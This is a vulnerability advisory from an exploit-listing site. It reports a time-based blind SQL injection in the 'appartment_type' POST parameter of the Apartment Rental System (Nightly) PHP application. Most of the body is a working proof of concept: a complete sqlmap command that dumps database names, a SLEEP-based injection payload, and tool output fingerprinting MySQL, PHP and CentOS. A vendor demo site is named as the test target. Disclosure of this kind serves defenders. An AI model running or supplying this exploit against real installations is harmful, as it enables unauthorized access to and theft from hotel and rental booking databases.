Apartment Rental System - Time-Based Blind SQL İnjection

2017.05.09
tr Siber Güvenlik Akademisi (TR) tr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

<------------------ header data start ------------------- > ############################################################# # Application Name : Apartment Rental System (Nightly) # Vulnerable Type : Time-Based Blind SQL İnjection # Software Link: https://www.bestsoftinc.com/ # Tested On Demo Site: http://envato.bestsoftinc.net/apartment-rental-nightly/ # Author: Siber Gvenlik Akademisi - Pentester # Date: 08.05.2017 # Tested on: Windows 8.1 / Mozilla Firefox # Vulnerable Parameter: 'appartment_type' (POST) # SQLİ: http://localhost/apartment-rental-nightly/search-result.php # Proof of concept: sqlmap -u "http://localhost/apartment-rental-nightly/search-result.php" --data="appartment_type=2&check_in=05%2F12%2F2017&check_out=06%2F27%2F2017&maxbed=2&maxbath=2&sorting=asc&submit=SEARCH" --random-agent --threads=5 --dbs Parameter: appartment_type (POST) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: appartment_type=1 AND (SELECT * FROM (SELECT(SLEEP(5)))FmWg)&check_ in=06/04/2017&check_out=06/24/2017&maxbed=2&maxbath=1&sorting=desc&submit=SEARCH --- [15:58:50] [INFO] the back-end DBMS is MySQL web server operating system: Linux CentOS web application technology: Apache 2.4.6, PHP 5.4.16 back-end DBMS: MySQL 5.0.12 < ------------------- header data end of ------------------- >

References:

https://www.youtube.com/channel/UCjZcTUoYCR5nLj8G1riUvLw/featured


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top